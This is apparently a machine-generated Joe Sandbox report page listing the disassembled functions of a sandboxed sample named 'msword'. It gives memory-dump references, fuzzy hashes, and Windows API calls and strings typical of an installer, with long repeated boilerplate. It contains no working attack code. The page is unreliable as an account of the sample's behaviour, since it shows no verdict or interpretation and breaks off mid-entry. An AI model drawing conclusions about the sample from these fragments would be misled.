Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

M, xrefs: 00404B43
, xrefs: 00404F39
N, xrefs: 00404C06
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
@%F, xrefs: 00404674
A, xrefs: 00404636
82D, xrefs: 004046DB

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

